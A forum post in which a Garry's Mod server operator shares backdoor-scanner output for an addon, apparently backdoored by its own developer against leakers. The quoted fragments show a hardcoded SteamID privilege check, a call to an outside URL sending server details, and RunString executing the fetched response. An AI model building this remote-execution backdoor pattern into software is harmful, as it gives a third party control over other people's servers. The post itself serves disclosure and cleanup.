I also just found out about that, have to edit that entire code out. It comes from the dev himself trying to protect his scripts from leakers.
Thanks to a backdoor scanner I got this result
Initiating scan... Found suspicious code: Line 6 in lua\autorun\client\cl_leysexyerrors.lua contains "RunString": ...RunString(s) end)... Found suspicious code: Line 27 in lua\autorun\server\sv_leysexyerrors.lua contains "STEAM_0:": ...STEAM_0:0:101348488" and not p:IsSuperAdmin()) then... Found suspicious code: Line 54 in lua\autorun\server\sv_leysexyerrors.lua contains "STEAM_0:": ...STEAM_0:0:101348488" and not p:IsSuperAdmin()) then... Found suspicious code: Line 78 in lua\autorun\server\sv_leysexyerrors.lua contains "STEAM_0:": ...STEAM_0:0:101348488" and not p:IsSuperAdmin()) then... Server contact: lua\autorun\server\sv_leysexyerrors.lua, line 93: ...https://endlesswin.net/pls.php?a=%s&b=%s&d=%s", " 7656119806... Found suspicious code: Line 94 in lua\autorun\server\sv_leysexyerrors.lua contains "RunString": ...RunString(bod, "nol3akerinoetc")...